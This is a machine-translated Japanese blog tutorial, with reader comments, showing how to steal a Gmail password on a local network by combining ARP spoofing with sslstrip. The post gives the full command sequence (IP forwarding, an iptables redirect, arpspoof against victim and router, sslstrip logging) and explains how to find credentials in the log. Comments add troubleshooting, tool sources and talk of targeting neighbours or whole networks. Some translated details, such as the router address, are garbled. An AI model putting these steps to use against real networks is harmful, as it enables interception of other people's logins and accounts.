ArpSpoofingとSSlstripの動作。

こんにちはブロガー。

今日は、私たちの多くが好む安全でないネットワークに接続することがどれほど危険であるかについての小さなサンプルがあります。

今日は、SslstripでArpSpoofingを使用してGmailのパスワードを取得します。 環境をより制御するために、私は「testarp@gmail.com"。

そして、私は前文があまり好きではないので、ビジネスに取り掛かりましょう。

私は、彼らが以下の情報で何ができるかについて、いつでも責任を負いません。 私は教育目的のためだけにそれをします

環境

このテストでは、次のようになります。

1.攻撃者: DebianWheezyを搭載しているのは私のデスクトップまたはデスクトップコンピュータです。 リポジトリからインストールできます sslストリップ y dsniff 持ってもらうために スプーフィング

2.犠牲者: 被害者は、ブラウザから自分のメールを見たいだけのAndroidタブレットです。

3.媒体: 真ん中は私の CiscoDPC2425ルーター

住所。

攻撃者のアドレス: 172.26.0.2

ルーターアドレス:007

被害者の住所: 172.26.0.8

攻撃:

攻撃がどのように機能するかをもう少し理解するために、あなたは私の古いものに行くことができます POST

この攻撃に対して最初に行うことは、転送をアクティブにして、コンピューターが被害者に気付かれることなく情報を転送できるようにすることです。 (それ以外の場合は、サービス拒否攻撃になります)

そのために使用します:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

ダイレクトコンソールウィンドウの各コマンド。

ここで tail -f を実行すると、 desdelinux 私たちは情報をライブで直接見ます

スナップショット1

では、どうすれば欲しいものを手に入れることができるでしょうか?

まず、タブレットにメールを入力しましょう。 ログインしていると、コンソールに何千ものものが表示されます。

これで完了したので、ファイルを開いてみましょう。desdelinux” ナノと一緒に

nano desdelinux

Control + Wを使用して、SECUREPOSTと呼ばれるものを検索します。

そして、私たちはこのようなものを見るでしょう。

スナップショット2

目に見えないその巨大な線の中には、被害者の電子メールとパスワードがあります。

それで、トンネルの終わりに最終的に光が見えるまで、私たちは右に走ります。

スナップショット3

別の機会に、これらの攻撃から自分自身を少し保護する方法を見ていきます。

よろしく


コメントを残す

あなたのメールアドレスが公開されることはありません。 必須フィールドには付いています *

*

*

  1. データの責任者:MiguelÁngelGatón
  2. データの目的:SPAMの制御、コメント管理。
  3. 正当化:あなたの同意
  4. データの伝達:法的義務がある場合を除き、データが第三者に伝達されることはありません。
  5. データストレージ:Occentus Networks(EU)がホストするデータベース
  6. 権利:いつでも情報を制限、回復、削除できます。

  1.   @jlcmax

    私はこの機会に、投稿が公開されたとき、コマンドが正しくなかったと言います。

    最後のiptablesコマンドには、別の行にある8080がありません。 そして、arpspoofコマンドはすべて同じ行にありました。 各コマンドは異なる行にあります。

    うまくいけば、編集者はそれを見て、それを修正することができます。

    ご挨拶。

    1.    マヌエルデラフエンテ

      私はあなたが言及した修正をしました、それは大丈夫ですか?

      優先エントリにコードを挿入する場合は、HTMLビューを使用し、記事が正しいことを確認してから、保留に送信してください。 ありがとうございました。

  2.   ルイス

    知識を持っていない私たちがとても脆弱であることを知るのはぞっとします。 内容がほとんどわからなくても、とても良い情報だと実感しています。 ありがとうございました!
    よろしく

  3.   ギスカード

    ただし、これは、攻撃者と被害者が同じネットワーク上にいる場合にのみ機能します。 いずれにせよ、(同じネットワーク上にある)HTTPSを使用して接続した場合、マシンを離れる前にデータが暗号化されているため、HTTPSを使用して接続することはできないようです。 HTTP(Sなし)で接続すると、ネットワークケーブルを見ても鍵が見えると思います。

    1.    @jlcmax

      それは本当ではない。 私はGmailキーをハッキングしていますが、Gmailがhttpsを使用していることに気付いた場合。 そう? 重要なのは、httpsは安全ですが、httpに依存しているということです。 したがって、それほど安全ではありません。

      Sがスーパーマン用ではなく「安全」用であるほどhttpsについてあまり告白しないでください

    2.    RTする

      httpsの有無にかかわらず動作します。より専門的なLinuxディストリビューションで試してみましたが、問題なく動作します。

    3.    マヌエルデラフエンテ

      Wi-Fiを盗む人にレッスンを教えるために正確に使用できます。 😀

      それは、彼らがずっと前にChemaAlonsoのブログで言ったことと多かれ少なかれ似ています。

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    レイヨナン式

        オスティア、それが何をするのか素晴らしいです!/そして、彼らが銀行口座をチェックするために行くとき、私がVPNを使うたびに彼らは私の妄想を言います…)。 ちなみに、コメントには皮肉な人がいるのを見る必要があります...結局それが盗んでいるのなら...

        1.    エリオタイム3000

          次に、独自のVPNサービスを作成して提供する方法についてのチュートリアルを受講する必要があります。

      2.    Daniel Mölk

        あなたがリンクしている話はとても面白いです、それは小説の本に値するようです、そしてこれは私が私の隣人のインターネットを使ったときを思い出させます、そして私は主題を知っていると言いますが、私はの本当の次元を決して見ることができなかったと思います幸いなことに、私が最後に持つ可能性のある危険性は、パスワードをWPA2に変更するだけでした。そこで、ISPとの私の話が始まりました。

    4.    モーリシャス

      そのため、タイトルにはSslstripの動作が示されています。

      攻撃者が真ん中にいる限り、それは機能します

  4.   アノン

    プリズムではどの波を使っていますか? -.-
    いいえ。
    リクエストを送信するのを待っていますXD
    よろしく
    良いポスト

  5.   アウロスZx

    興味深いことに、後で教育テストを行います...たぶんWiFiのパスワードを削除して、少し楽しむこともできます😛
    万が一、ターゲットが要求したページに異なるページを送信するのと同じようなことができますか? たとえば、彼らはFacebookを開きたいのですが、私は彼らをGoogleにリダイレクトしますか? 😛

    1.    @jlcmax

      はい。 しかし、それはすべて非常に異なる役割です。

      後で投稿するかもしれません。

  6.   最後の新人

    非常に良い投稿です。これらのトピックは非常に教育的です。一部(私のような)はパブリックネットワーク(たとえば大学)に接続しているため、この攻撃に対抗できる必要があります。これを回避すると便利です。

    ご挨拶!

  7.   ちょうど別のdl-user

    それは私にはうまくいきませんでした🙁

  8.   ウォーカー

    https接続がサーバー証明書(マシンに証明書を取得すると、ブラウザーが暗号化を担当します)を使用して、80ではなくポート443(http)にリダイレクトするiptablesを使用して暗号化されるという事実を除けば、ここで何かが失敗しますこれはhttpsです

    1.    @jlcmax

      私もそう思った。 重要なのは、httpsは「安全」ですが、残念ながらhttpに依存しているということです。 したがって、sslstripはそれを利用して、ブラウザにhttps資格情報を使用していると認識させますが、そうではありません。

      1.    ウォーカー

        神聖なたわごと! しかし、ブラウザには「この証明書は疑わしいサイトなどからのものです」などの警告が表示されるはずです...私は間違いなくXDのテストを行う必要があります

        1.    @jlcmax

          いいえ、まったく何も出てきません。

  9.   ちょうど別のdl-user

    それはついに私のために働いた
    WEPネットワークにパスワードで接続していますが、とにかくパスワードが直接表示されました。

    クエリ。 これと同じ手順を実行できますが、被害者がXNUMX人ではなく、ネットワークに接続されているすべてのコンピューターに対して実行できますか?

    1.    @jlcmax

      はい、できます。 しかし、私は実験をしていません。 自分で試してみて、あなたのやり方を教えてください。

  10.   シニック19

    これで私が得る唯一のことは、被害者のマシンがオフラインになることですが、sslstripは私に何も表示しません:/

    1.    @jlcmax

      しばらくの間ファイアウォールを無効にする必要があります。 または、少なくとも着信接続を有効にします。

  11.   ミスター・ブラック

    プローブと私はFacebookページのユーザー名とパスワードしか見ることができませんでした。Gmailではログに結果が見つかりませんでした。また、arpspoof«arpspoof -i-t«の行だけが必要でした。 一方、被害者のマシンは一部のページを開くことができませんでした。 私は調査を続けます、それは非常に興味深いです。 Manjaroを使用する人のためのヘルプ、インストールするパッケージは、dsniff(ここではarpspoffです)、twisted、およびpython2-pyopensslです。 Sslstripはここからダウンロードできます: http://www.thoughtcrime.org/software/sslstrip/
    それを実行するには$ python2 sslstrip.py
    ご挨拶。

  12.   ミスター・ブラック

    出てこなかったが、arpspoof行は次のとおりです。#arpspoof -i int -t ip-victim ip-router

  13.   ギルバート

    私はあなたの言うことを正確にやっています:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    問題は、私がここにいる別のPCである被害者が、ルーターを再起動する必要があるポイントに接続されていないままになっていることです。どうすればよいですか。

    私が仮想マシンで作業しているもう0つのことは、iwconfigコマンドを実行すると、wlan0が表示されず、ifconfigを実行しても表示されません。ただし、仮想マシンにインターネットがある場合は、ethXNUMXインターフェイスを使用します。